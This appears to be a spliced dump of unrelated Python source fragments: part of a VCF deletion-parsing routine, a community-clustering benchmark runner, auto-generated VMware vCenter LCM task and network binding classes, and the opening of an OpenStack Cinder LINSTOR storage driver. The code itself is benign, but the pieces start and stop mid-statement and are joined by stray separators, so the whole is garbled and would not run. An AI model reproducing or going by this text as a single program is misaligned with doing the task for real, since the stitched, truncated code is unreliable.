"Reference base preceding deletion does not match")
del_len = df_snvs.loc[del_mask, "REF"].str.len() - 1
df_del = pd.DataFrame(
np.repeat(df_snvs[del_mask].values, del_len.to_list(), axis=0))
df_del.columns = df_snvs.columns
df_del["ALT"] = '-'
aux_idx = 0
aux_pos = df_del.columns.get_loc("POS")
aux_ref = df_del.columns.get_loc("REF")
for idx, row in df_snvs[del_mask].iterrows():
# ignore first base as it corresponds to the reference at the
# preceding locus
ref = list(row["REF"][1:])
pos = [row["POS"] + x + 1 for x in range(len(ref))]
df_del.iloc[aux_idx:(aux_idx + del_len[idx]), aux_pos] = pos
df_del.iloc[aux_idx:(aux_idx + del_len[idx]), aux_ref] = ref
aux_idx += del_len[idx]
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
\descr: List of the clustering algorithms to be executed by the benchmark and accessory routines.
Execution function for each algorithm must be named "exec<Algname>" and have the following signature:
def execAlgorithm(execpool, netfile, asym, timeout, pathid='', selfexec=False):
Execute the algorithm (stub)
execpool - execution pool to perform execution of current task
netfile - input network to be processed
asym - network links weights are asymmetric (in/outbound weights can be different)
timeout - execution timeout for this task
pathid - path id of the net to distinguish nets with the same name located in different dirs.
Note: pathid is prepended with the separator symbol
selfexec - current execution is the external or internal self call
return - number of executions (jobs) made
\author: (c) <NAME> <<EMAIL>>
\organizations: eXascale Infolab <http://exascale.info/>, Lumais <http://www.lumais.com/>, ScienceWise <http://sciencewise.info/>
\date: 2015-07
"""
from __future__ import print_function # Required for stderr output, must be the first import
import os
import shutil
import glob
import sys
import inspect # To automatically fetch algorithm name
import traceback # Stacktrace
from datetime import datetime
from contrib.mpepool import *
from benchutils import *
from sys import executable as PYEXEC # Full path to the current Python interpreter
from benchutils import _SEPPARS
from benchevals import _SEPNAMEPART
from benchevals import _ALGSDIR
from benchevals import _RESDIR
from benchevals import _CLSDIR
from benchevals import _EXTERR
from benchevals import _EXTEXECTIME
from benchevals import _EXTAGGRES
from benchevals import _EXTAGGRESEXT
_EXTLOG = '.log'
_EXTCLNODES = '.cnl' # Clusters (Communities) Nodes Lists
_APREFIX = 'exec' # Prefix of the executing application / algorithm
def aggexec(algs):
"""Aggregate execution statistics
Aggregate execution results over all network instances and shuffles, and output
the total, average, min and max values for each network type per algorithm.
Expected format of the aggregating files:
# ExecTime(sec) CPU_time(sec) CPU_usr(sec) CPU_kern(sec) RSS_RAM_peak(Mb) TaskName
0.550262 0.526599 0.513438 0.013161 2.086 syntmix/1K10/1K10^1!k7.1#1
...
algs - algorithms that were executed, whose resource consumption should be aggregated
#>>> aggexec(['scp', 'ganxis']) is None
#True
"""
#exectime = {} # netname: [alg1_stat, alg2_stat, ...]
mnames = ('exectime', 'cputime', 'rssmem') # Measure names; ATTENTION: for the correct output memory must be the last one
measures = [{}, {}, {}] # exectime, cputime, rssmem
malgs = [] # Measured algs
ialg = 0 # Algorithm index
for alg in algs:
algesfile = ''.join((_RESDIR, alg, _EXTEXECTIME))
try:
with open(algesfile, 'r') as aest:
malgs.append(alg)
for ln in aest:
# Strip leading spaces
ln = ln.lstrip()
# Skip comments
if not ln or ln[0] == '#':
continue
# Parse the content
fields = ln.split(None, 5)
# Note: empty and spaces strings were already excluded
assert len(fields) == 6, (
'Invalid format of the resource consumption file "{}": {}'.format(algesfile, ln))
# Fetch and accumulate measures
# Note: rstrip() is required, because fields[5] can end with '\n'; os.path.split(...)[1]
net = delPathSuffix(fields[5].rstrip(), True) # Note: name can't be a path here
#print('> net: >>>{}<<< from >{}<'.format(net, fields[5]), file=sys.stderr)
assert net, 'Network name must exist'
etime = float(fields[0])
ctime = float(fields[1])
rmem = float(fields[4])
for imsr, val in enumerate((etime, ctime, rmem)):
netstats = measures[imsr].setdefault(net, [])
if len(netstats) <= ialg:
assert len(netstats) == ialg, 'Network statistics are not synced with algorithms: ialg={}, net: {}, netstats: {}'.format(ialg, net, netstats)
netstats.append(ItemsStatistic('_'.join((alg, net)), val, val))
netstats[-1].add(val)
except IOError:
print('WARNING, execution results for "{}" do not exist, skipped.'.format(alg), file=sys.stderr)
else:
ialg += 1
# Check number of the algorithms to be outputted
if not malgs:
print('WARNING, there are no algorithm execution results to be aggregated.', file=sys.stderr)
return
# Output results
timestamp = datetime.utcnow()
for imsr, measure in enumerate(mnames):
resfile = ''.join((_RESDIR, measure, _EXTAGGRES))
resxfile = ''.join((_RESDIR, measure, _EXTAGGRESEXT))
try:
with open(resfile, 'a') as outres, open(resxfile, 'a') as outresx:
# The header is unified for multiple outputs only for the outresx
if not os.path.getsize(resxfile):
outresx.write('# <network>\n#\t<alg1_outp>\n#\t<alg2_outp>\n#\t...\n') # ExecTime(sec), ExecTime_avg(sec), ExecTime_min\tExecTime_max
# Output timestamp
outres.write('# --- {} ---\n'.format(timestamp))
outresx.write('# --- {} ---\n'.format(timestamp))
# Output header, which might differ for distinct runs by number of algs
outres.write('# <network>')
for alg in malgs:
outres.write('\t{}'.format(alg))
outres.write('\n')
# Output results for each network
for netname, netstats in measures[imsr].iteritems():
outres.write(netname)
outresx.write(netname)
for ialg, stat in enumerate(netstats):
if not stat.fixed:
stat.fix()
# Output sum for time, but avg for mem
val = stat.sum if imsr < len(mnames) - 1 else stat.avg
outres.write('\t{:.3f}'.format(val))
outresx.write('\n\t{}>\ttotal: {:.3f}, per_item: {:.6f} ({:.6f} .. {:.6f})'
.format(malgs[ialg], val, stat.avg, stat.min, stat.max))
outres.write('\n')
outresx.write('\n')
except IOError as err:
print('ERROR, "{}" results output execution is failed: {}. {}'
.format(measure, err, traceback.format_exc()), file=sys.stderr)
def preparePath(taskpath):
"""Create the path if required, otherwise move existent data to backup.
All instances and shuffles of each network are handled together and only once,
even on calling this function for each shuffle.
NOTE: To process files starting with taskpath, it should not contain '/' in the end
taskpath - the path to be prepared
"""
# Backup existent files & dirs with such base only if this path exists and is not empty
# ATTENTION: do not use only basePathExists(taskpath) here, to avoid moving the currently
# processed paths to the backup when xxx.mod.net is processed before xxx.net (they have the same base)
if os.path.exists(taskpath) and not dirempty(taskpath):
mainpath = delPathSuffix(taskpath)
backupPath(mainpath, True)
# Create target path if not exists
if not os.path.exists(taskpath):
os.makedirs(taskpath)
# ATTENTION: this function should not be defined, so that it is not automatically executed
#def execAlgorithm(execpool, netfile, asym, timeout, pathid='', selfexec=False, **kwargs):
# """Execute the algorithm (stub)
#
# execpool - execution pool to perform execution of current task
# netfile - input network to be processed
# asym - network links weights are asymmetric (in/outbound weights can be different)
# timeout - execution timeout for this task
# pathid - path id of the net to distinguish nets with the same name located in different dirs.
# Note: pathid is prepended with the separator symbol
# selfexec=False - current execution is the external or internal self call
# kwargs - optional algorithm-specific keyword arguments
#
# return - number of executions (executed jobs)
# """
# assert execpool and netfile and (asym is None or isinstance(asym, bool)) and timeout + 0 >= 0, (
# 'Invalid input parameters:\n\texecpool: {},\n\tnet: {},\n\tasym: {},\n\ttimeout: {}'
# .format(execpool, netfile, asym, timeout))
# # ATTENTION: for the correct execution algname must be always the same as func lower case name without the prefix "exec"
# algname = funcToAppName(inspect.currentframe().f_code.co_name) # 'louvain_igraph'
# return 0
def funcToAppName(funcname):
"""Fetch name of the execution application by the function name"""
assert funcname.startswith(_APREFIX), 'Executing application is expected instead of "{}"'.format(funcname)
return funcname[len(_APREFIX):].lower()
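# Example: funcToAppName('execLouvain_igraph') returns 'louvain_igraph'.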
# Louvain
## Original Louvain
#def execLouvain(execpool, netfile, asym, timeout, pathid='', tasknum=0):
# """Execute Louvain
# Results are not stable => multiple execution is desirable.
#
# tasknum - index of the execution on the same dataset
# """
# # Fetch the task name and chose correct network filename
# netfile = os.path.splitext(netfile)[0] # Remove the extension
# task = os.path.split(netfile)[1] # Base name of the network
# assert task, 'The network name should exist'
# if tasknum:
# task = '-'.join((task, str(tasknum)))
# netfile = '../' + netfile # Use network in the required format
#
# algname = funcToAppName(inspect.currentframe().f_code.co_name) # 'louvain'
# # ./community graph.bin -l -1 -w graph.weights > graph.tree
# args = ('../exectime', ''.join(('-o=../', _RESDIR, algname, _EXTEXECTIME)), ''.join(('-n=', task, pathid)), '-s=/etime_' + algname
# , './community', netfile + '.lig', '-l', '-1', '-v', '-w', netfile + '.liw')
# execpool.execute(Job(name=_SEPNAMEPART.join((algname, task)), workdir=_ALGSDIR, args=args
# , timeout=timeout, stdout=''.join((_RESDIR, algname, '/', task, '.loc'))
# , stderr=''.join((_RESDIR, algname, '/', task, _EXTLOG))))
# return 1
#
#
#def evalLouvain(execpool, basefile, measure, timeout):
# return
def execLouvain_igraph(execpool, netfile, asym, timeout, pathid='', selfexec=False):
"""Execute Louvain
Results are not stable => multiple execution is desirable.
returns number of executions or None
"""
assert execpool and netfile and (asym is None or isinstance(asym, bool)) and timeout + 0 >= 0, (
'Invalid input parameters:\n\texecpool: {},\n\tnet: {},\n\tasym: {},\n\ttimeout: {}'
.format(execpool, netfile, asym, timeout))
# Fetch the task name and chose correct network filename
netfile, netext = os.path.splitext(netfile) # Remove the extension
task = os.path.split(netfile)[1] # Base name of the network
assert task, 'The network name should exist'
#if tasknum:
# task = '_'.join((task, str(tasknum)))
# ATTENTION: for the correct execution algname must be always the same as func lower case name without the prefix "exec"
algname = funcToAppName(inspect.currentframe().f_code.co_name) # 'louvain_igraph'
# ./louvain_igraph.py -i=../syntnets/1K5.nsa -ol=louvain_igoutp/1K5/1K5.cnl
taskpath = ''.join((_RESDIR, algname, '/', _CLSDIR, task, pathid))
preparePath(taskpath)
## Louvain accumulated statistics over shuffled modification of the network or total statistics for all networks
#extres = '.acs'
#if not selfexec:
# outpdir = ''.join((_RESDIR, algname, '/'))
# if not os.path.exists(outpdir):
# os.makedirs(outpdir)
# # Just erase the file of the accum results
# with open(taskpath + extres, 'w') as accres:
# accres.write('# Accumulated results for the shuffles\n')
#
#def postexec(job):
# """Copy final modularity output to the separate file"""
# # File name of the accumulated result
# # Note: here full path is required
# accname = ''.join((_ALGSDIR, _RESDIR, algname, extres))
# with open(accname, 'a') as accres: # Append to the end
# # TODO: Evaluate the average
# subprocess.call(('tail', '-n 1', taskpath + _EXTLOG), stdout=accres)
args = ('../exectime', ''.join(('-o=../', _RESDIR, algname, _EXTEXECTIME)), ''.join(('-n=', task, pathid)), '-s=/etime_' + algname
# Note: igraph-python is a Cython wrapper around C igraph lib. Calls are much faster on CPython than on PyPy
, 'python', ''.join(('./', algname, '.py')), ''.join(('-i=../', netfile, netext))
, ''.join(('-ol=../', taskpath, _EXTCLNODES)))
execpool.execute(Job(name=_SEPNAMEPART.join((algname, task)), workdir=_ALGSDIR, args=args, timeout=timeout
#, ondone=postexec
, stdout=os.devnull, stderr=''.join((taskpath, _EXTLOG))))
execnum = 1
# Note: execution on shuffled network instances is now generalized for all algorithms
## Run again for all shuffled nets
#if not selfexec:
# selfexec = True
# netdir = os.path.split(netfile)[0] + '/'
# #print('Netdir: ', netdir)
# for netfile in glob.iglob(''.join((escapePathWildcards(netdir), escapePathWildcards(task), | |
self.error = error
self.start_time = start_time
self.end_time = end_time
self.user = user
VapiStruct.__init__(self)
SubTaskInfo._set_binding_type(type.StructType(
'com.vmware.vcenter.lcm.sub_task_info', {
'progress': type.ReferenceType('com.vmware.cis.task_client', 'Progress'),
'last_updated_time': type.DateTimeType(),
'result': type.OptionalType(type.ReferenceType(__name__, 'Result')),
'external_tools': type.ListType(type.ReferenceType(__name__, 'ExternalTool')),
'description': type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage'),
'service': type.IdType(resource_types='com.vmware.vapi.service'),
'operation': type.IdType(resource_types='com.vmware.vapi.operation'),
'parent': type.OptionalType(type.IdType()),
'target': type.OptionalType(type.ReferenceType('com.vmware.vapi.std_client', 'DynamicID')),
'status': type.ReferenceType('com.vmware.cis.task_client', 'Status'),
'cancelable': type.BooleanType(),
'error': type.OptionalType(type.AnyErrorType()),
'start_time': type.OptionalType(type.DateTimeType()),
'end_time': type.OptionalType(type.DateTimeType()),
'user': type.OptionalType(type.StringType()),
},
SubTaskInfo,
False,
None))
class TaskInfo(VapiStruct):
"""
The container that contains the status information of a deployment.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'status',
{
'RUNNING' : [('progress', True), ('start_time', True)],
'FAILED' : [('progress', True), ('error', False), ('start_time', True), ('end_time', True)],
'SUCCEEDED' : [('progress', True), ('start_time', True), ('end_time', True)],
'BLOCKED' : [('progress', True), ('start_time', True)],
'PENDING' : [],
}
),
]
def __init__(self,
metadata_file=None,
state=None,
progress=None,
last_updated_time=None,
subtask_order=None,
subtasks=None,
appliance_info=None,
result=None,
additional_info=None,
description=None,
service=None,
operation=None,
parent=None,
target=None,
status=None,
cancelable=None,
error=None,
start_time=None,
end_time=None,
user=None,
):
"""
:type metadata_file: :class:`str`
:param metadata_file: The path of the metadata file.
:type state: :class:`str` or ``None``
:param state: The state of appliance being deployed.
May not have any state information.
:type progress: :class:`com.vmware.cis.task_client.Progress`
:param progress: The total progress of the deployment operation.
This attribute is optional and it is only relevant when the value
of ``#status`` is one of
:attr:`com.vmware.cis.task_client.Status.RUNNING`,
:attr:`com.vmware.cis.task_client.Status.FAILED`,
:attr:`com.vmware.cis.task_client.Status.SUCCEEDED`, or
:attr:`com.vmware.cis.task_client.Status.BLOCKED`.
:type last_updated_time: :class:`datetime.datetime`
:param last_updated_time: The time that the last update is registered.
:type subtask_order: :class:`list` of :class:`list` of :class:`str` or ``None``
:param subtask_order: The ordered list of subtasks for this deployment operation.
Only :class:`set` when the appliance state is RUNNING_IN_PROGRESS,
FAILED, CANCELLED and SUCCEEDED.
:type subtasks: (:class:`dict` of :class:`str` and :class:`SubTaskInfo`) or ``None``
:param subtasks: The map of the deployment subtasks and their status information.
Only :class:`set` when the appliance state is RUNNING_IN_PROGRESS,
FAILED, CANCELLED and SUCCEEDED.
:type appliance_info: :class:`DeploymentInfo` or ``None``
:param appliance_info: Information about the appliance deployed.
Such information may not be available for requests that are not for
deployment (validation/recommendation).
:type result: :class:`DataValue` or ``None``
:param result: The result of validation or recommendation requests.
Not applicable for precheck/deployment operation.
:type additional_info: :class:`str` or ``None``
:param additional_info: Additional information that a response may contain.
Not all response will contain additional information.
:type description: :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param description: Description of the operation associated with the task.
:type service: :class:`str`
:param service: Identifier of the service containing the operation.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vapi.service``. When methods return a value of this
class as a return value, the attribute will be an identifier for
the resource type: ``com.vmware.vapi.service``.
:type operation: :class:`str`
:param operation: Identifier of the operation associated with the task.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vapi.operation``. When methods return a value of this
class as a return value, the attribute will be an identifier for
the resource type: ``com.vmware.vapi.operation``.
:type parent: :class:`str` or ``None``
:param parent: Parent of the current task.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.cis.task``. When methods return a value of this class
as a return value, the attribute will be an identifier for the
resource type: ``com.vmware.cis.task``.
This attribute will be None if the task has no parent.
:type target: :class:`com.vmware.vapi.std_client.DynamicID` or ``None``
:param target: Identifier of the target created by the operation or an existing
one the operation performed on.
This attribute will be None if the operation has no target or
multiple targets.
:type status: :class:`com.vmware.cis.task_client.Status`
:param status: Status of the operation associated with the task.
:type cancelable: :class:`bool`
:param cancelable: Flag to indicate whether or not the operation can be cancelled. The
value may change as the operation progresses.
:type error: :class:`Exception` or ``None``
:param error: Description of the error if the operation status is "FAILED".
If None the description of why the operation failed will be
included in the result of the operation (see
:attr:`com.vmware.cis.task_client.Info.result`).
:type start_time: :class:`datetime.datetime`
:param start_time: Time when the operation is started.
This attribute is optional and it is only relevant when the value
of ``status`` is one of
:attr:`com.vmware.cis.task_client.Status.RUNNING`,
:attr:`com.vmware.cis.task_client.Status.BLOCKED`,
:attr:`com.vmware.cis.task_client.Status.SUCCEEDED`, or
:attr:`com.vmware.cis.task_client.Status.FAILED`.
:type end_time: :class:`datetime.datetime`
:param end_time: Time when the operation is completed.
This attribute is optional and it is only relevant when the value
of ``status`` is one of
:attr:`com.vmware.cis.task_client.Status.SUCCEEDED` or
:attr:`com.vmware.cis.task_client.Status.FAILED`.
:type user: :class:`str` or ``None``
:param user: Name of the user who performed the operation.
This attribute will be None if the operation is performed by the
system.
"""
self.metadata_file = metadata_file
self.state = state
self.progress = progress
self.last_updated_time = last_updated_time
self.subtask_order = subtask_order
self.subtasks = subtasks
self.appliance_info = appliance_info
self.result = result
self.additional_info = additional_info
self.description = description
self.service = service
self.operation = operation
self.parent = parent
self.target = target
self.status = status
self.cancelable = cancelable
self.error = error
self.start_time = start_time
self.end_time = end_time
self.user = user
VapiStruct.__init__(self)
TaskInfo._set_binding_type(type.StructType(
'com.vmware.vcenter.lcm.task_info', {
'metadata_file': type.StringType(),
'state': type.OptionalType(type.StringType()),
'progress': type.OptionalType(type.ReferenceType('com.vmware.cis.task_client', 'Progress')),
'last_updated_time': type.DateTimeType(),
'subtask_order': type.OptionalType(type.ListType(type.ListType(type.StringType()))),
'subtasks': type.OptionalType(type.MapType(type.StringType(), type.ReferenceType(__name__, 'SubTaskInfo'))),
'appliance_info': type.OptionalType(type.ReferenceType(__name__, 'DeploymentInfo')),
'result': type.OptionalType(type.OpaqueType()),
'additional_info': type.OptionalType(type.StringType()),
'description': type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage'),
'service': type.IdType(resource_types='com.vmware.vapi.service'),
'operation': type.IdType(resource_types='com.vmware.vapi.operation'),
'parent': type.OptionalType(type.IdType()),
'target': type.OptionalType(type.ReferenceType('com.vmware.vapi.std_client', 'DynamicID')),
'status': type.ReferenceType('com.vmware.cis.task_client', 'Status'),
'cancelable': type.BooleanType(),
'error': type.OptionalType(type.AnyErrorType()),
'start_time': type.OptionalType(type.DateTimeType()),
'end_time': type.OptionalType(type.DateTimeType()),
'user': type.OptionalType(type.StringType()),
},
TaskInfo,
False,
None))
class TemporaryNetwork(VapiStruct):
"""
Configuration of the temporary network which is used during
upgrade/migrate.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'mode',
{
'STATIC' : [('ip', True), ('dns_servers', True), ('prefix', True), ('gateway', True)],
'DHCP' : [],
}
),
]
def __init__(self,
ip_family=None,
mode=None,
ip=None,
dns_servers=None,
prefix=None,
gateway=None,
):
"""
:type ip_family: :class:`TemporaryNetwork.IpType` or ``None``
:param ip_family: Network IP address family.
If None, defaults to IPV4
:type mode: :class:`TemporaryNetwork.NetworkMode`
:param mode: Network mode.
:type ip: :class:`str`
:param ip: Network IP address. Required for static mode only.
This attribute is optional and it is only relevant when the value
of ``mode`` is :attr:`TemporaryNetwork.NetworkMode.STATIC`.
:type dns_servers: :class:`list` of :class:`str`
:param dns_servers: A comma-separated list of IP addresses of DNS servers. A JSON array
such as ["192.168.3.11", "127.0.0.1"]. Required for static mode only.
DNS servers must be reachable from the machine that runs CLI
installer
This attribute is optional and it is only relevant when the value
of ``mode`` is :attr:`TemporaryNetwork.NetworkMode.STATIC`.
:type prefix: :class:`long`
:param prefix: Network prefix length. Required for static mode only. Remove if the
mode is "dhcp". This is the number of bits set in the subnet mask;
for instance, if the subnet mask is 255.255.255.0, there are 24
bits in the binary version of the subnet mask, so the prefix length
is 24. If used, the values must be in the inclusive range of 0 to
32 for IPv4 and 0 to 128 for IPv6. Required for static mode only.
This attribute is optional and it is only relevant when the value
of ``mode`` is :attr:`TemporaryNetwork.NetworkMode.STATIC`.
:type gateway: :class:`str`
:param gateway: Gateway of the network. Required for static mode only.
This attribute is optional and it is only relevant when the value
of ``mode`` is :attr:`TemporaryNetwork.NetworkMode.STATIC`.
"""
self.ip_family = ip_family
self.mode = mode
self.ip = ip
self.dns_servers = dns_servers
self.prefix = prefix
self.gateway = gateway
VapiStruct.__init__(self)
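# Illustrative construction (hypothetical addresses), using the STATIC mode
# referenced in the docstrings above:
#   net = TemporaryNetwork(
#       ip_family=TemporaryNetwork.IpType.IPV4,
#       mode=TemporaryNetwork.NetworkMode.STATIC,
#       ip='192.168.3.20',
#       dns_servers=['192.168.3.11'],
#       prefix=24,
#       gateway='192.168.3.1')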
class IpType(Enum):
"""
Network IP address family.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
IPV4 = None
"""
IPv4 Type of IP address.
"""
IPV6 = None
"""
IPv6 | |
# Source: scottwedge/openstack-cinder
# Copyright (c) 2014-2019 LINBIT HA Solutions GmbH
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""This driver connects Cinder to an installed LINSTOR instance.
See https://docs.linbit.com/docs/users-guide-9.0/#ch-openstack-linstor
for more details.
"""
import socket
import uuid
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import importutils
from oslo_utils import units
from cinder import exception
from cinder.i18n import _
from cinder.image import image_utils
from cinder import interface
from cinder.volume import configuration
from cinder.volume import driver
try:
import linstor
lin_drv = linstor.Linstor
except ImportError:
linstor = None
lin_drv = None
# To override these values, update cinder.conf in /etc/cinder/
linstor_opts = [
cfg.StrOpt('linstor_default_volume_group_name',
default='drbd-vg',
help='Default Volume Group name for LINSTOR. '
'Not Cinder Volume.'),
cfg.StrOpt('linstor_default_uri',
default='linstor://localhost',
help='Default storage URI for LINSTOR.'),
cfg.StrOpt('linstor_default_storage_pool_name',
default='DfltStorPool',
help='Default Storage Pool name for LINSTOR.'),
cfg.FloatOpt('linstor_volume_downsize_factor',
default=4096,
help='Default volume downscale size in KiB = 4 MiB.'),
cfg.IntOpt('linstor_default_blocksize',
default=4096,
help='Default Block size for Image restoration. '
'When using iSCSI transport, this option '
'specifies the block size.'),
cfg.IntOpt('linstor_autoplace_count',
default=0,
help='Autoplace replication count on volume deployment. '
'0 = Full cluster replication without autoplace, '
'1 = Single node deployment without replication, '
'2 or greater = Replicated deployment with autoplace.'),
cfg.BoolOpt('linstor_controller_diskless',
default=True,
help='True means Cinder node is a diskless LINSTOR node.')
]
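# A minimal illustrative cinder.conf backend section using the options defined
# above (section name and values are examples only):
#
#   [linstor-drbd]
#   volume_backend_name = linstor-drbd
#   linstor_default_uri = linstor://linstor-controller.example.org
#   linstor_default_storage_pool_name = DfltStorPool
#   linstor_autoplace_count = 2
#   linstor_controller_diskless = True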
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(linstor_opts, group=configuration.SHARED_CONF_GROUP)
CINDER_UNKNOWN = 'unknown'
DM_VN_PREFIX = 'CV_'
DM_SN_PREFIX = 'SN_'
DISKLESS = 'DISKLESS'
LVM = 'LVM'
LVM_THIN = 'LVM_THIN'
ZFS = 'ZFS'
ZFS_THIN = 'ZFS_THIN'
class LinstorBaseDriver(driver.VolumeDriver):
"""Cinder driver that uses LINSTOR for storage.
Version History:
.. code-block:: none
1.0.0 - Initial driver
1.1.0 - Updated driver to match LINSTOR backend improvements
"""
VERSION = '1.1.0'
# ThirdPartySystems wiki page
CI_WIKI_NAME = 'LINBIT_LINSTOR_CI'
def __init__(self, *args, **kwargs):
super(LinstorBaseDriver, self).__init__(*args, **kwargs)
LOG.debug('START: Base Init Linstor')
self.configuration.append_config_values(linstor_opts)
self.default_pool = self.configuration.safe_get(
'linstor_default_storage_pool_name')
self.default_uri = self.configuration.safe_get(
'linstor_default_uri')
self.default_downsize_factor = self.configuration.safe_get(
'linstor_volume_downsize_factor')
self.default_vg_name = self.configuration.safe_get(
'linstor_default_volume_group_name')
self.default_blocksize = self.configuration.safe_get(
'linstor_default_blocksize')
self.diskless = self.configuration.safe_get(
'linstor_controller_diskless')
self.ap_count = self.configuration.safe_get(
'linstor_autoplace_count')
self.default_backend_name = self.configuration.safe_get(
'volume_backend_name')
self.host_name = socket.gethostname()
@staticmethod
def get_driver_options():
return linstor_opts
def _ping(self):
with lin_drv(self.default_uri) as lin:
return lin.ping()
def _clean_uuid(self):
"""Returns a UUID string, WITHOUT braces."""
# Some uuid library versions put braces around the result.
# We don't want them, just a plain [0-9a-f-]+ string.
uuid_str = str(uuid.uuid4())
uuid_str = uuid_str.replace("{", "")
uuid_str = uuid_str.replace("}", "")
return uuid_str
# LINSTOR works in kiB units; Cinder uses GiB.
def _vol_size_to_linstor(self, size):
return int(size * units.Mi - self.default_downsize_factor)
def _vol_size_to_cinder(self, size):
return int(size / units.Mi)
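# Worked example: a 10 GiB Cinder volume is requested from LINSTOR as
# int(10 * units.Mi - 4096) = 10481664 KiB, and _vol_size_to_cinder() maps a
# LINSTOR size in KiB back to whole GiB by integer division with units.Mi.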
def _is_clean_volume_name(self, name, prefix):
try:
if (name.startswith(CONF.volume_name_template % "") and
uuid.UUID(name[7:]) is not None):
return prefix + name[7:]
except ValueError:
return None
try:
if uuid.UUID(name) is not None:
return prefix + name
except ValueError:
return None
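# Example, assuming Cinder's default volume_name_template of 'volume-%s': for a
# well-formed UUID string u, _is_clean_volume_name('volume-' + u, DM_VN_PREFIX)
# returns 'CV_' + u, while an unparsable name yields None.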
def _snapshot_name_from_cinder_snapshot(self, snapshot):
sn_name = self._is_clean_volume_name(snapshot['id'], DM_SN_PREFIX)
return sn_name
def _cinder_volume_name_from_drbd_resource(self, rsc_name):
cinder_volume_name = rsc_name.split(DM_VN_PREFIX)[1]
return cinder_volume_name
def _drbd_resource_name_from_cinder_snapshot(self, snapshot):
drbd_resource_name = '{}{}'.format(DM_VN_PREFIX,
snapshot['volume_id'])
return drbd_resource_name
def _drbd_resource_name_from_cinder_volume(self, volume):
drbd_resource_name = '{}{}'.format(DM_VN_PREFIX, volume['id'])
return drbd_resource_name
def _get_api_resource_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.resource_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_resource_dfn_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.resource_dfn_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_node_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.node_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_storage_pool_dfn_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.storage_pool_dfn_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_storage_pool_list(self):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
api_reply = lin.storage_pool_list()[0].__dict__['_rest_data']
if api_reply:
return api_reply
else:
return None
def _get_api_volume_extend(self, rsc_target_name, new_size):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
vol_reply = lin.volume_dfn_modify(
rsc_name=rsc_target_name,
volume_nr=0,
size=self._vol_size_to_linstor(new_size))
return vol_reply
def _api_snapshot_create(self, drbd_rsc_name, snapshot_name):
lin = linstor.Resource(drbd_rsc_name, uri=self.default_uri)
snap_reply = lin.snapshot_create(snapshot_name)
return snap_reply
def _api_snapshot_delete(self, drbd_rsc_name, snapshot_name):
lin = linstor.Resource(drbd_rsc_name, uri=self.default_uri)
snap_reply = lin.snapshot_delete(snapshot_name)
return snap_reply
def _api_rsc_dfn_delete(self, drbd_rsc_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
snap_reply = lin.resource_dfn_delete(drbd_rsc_name)
return snap_reply
def _api_storage_pool_create(self,
node_name,
storage_pool_name,
storage_driver,
driver_pool_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
sp_reply = lin.storage_pool_create(
node_name=node_name,
storage_pool_name=storage_pool_name,
storage_driver=storage_driver,
driver_pool_name=driver_pool_name)
return sp_reply
def _api_rsc_dfn_create(self, rsc_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
rsc_dfn_reply = lin.resource_dfn_create(rsc_name)
return rsc_dfn_reply
def _api_volume_dfn_create(self, rsc_name, size):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
vol_dfn_reply = lin.volume_dfn_create(
rsc_name=rsc_name,
storage_pool=self.default_pool,
size=size)
return vol_dfn_reply
def _api_volume_dfn_set_sp(self, rsc_target_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
snap_reply = lin.volume_dfn_modify(
rsc_name=rsc_target_name,
volume_nr=0,
set_properties={
'StorPoolName': self.default_pool
})
return snap_reply
def _api_rsc_create(self, rsc_name, node_name, diskless=False):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
if diskless:
storage_pool = None
else:
storage_pool = self.default_pool
new_rsc = linstor.ResourceData(rsc_name=rsc_name,
node_name=node_name,
storage_pool=storage_pool,
diskless=diskless)
rsc_reply = lin.resource_create([new_rsc], async_msg=False)
return rsc_reply
def _api_rsc_autoplace(self, rsc_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
new_rsc = linstor.Resource(name=rsc_name, uri=self.default_uri)
new_rsc.placement.redundancy = self.ap_count
new_rsc.placement.storage_pool = self.default_pool
rsc_reply = new_rsc.autoplace()
return rsc_reply
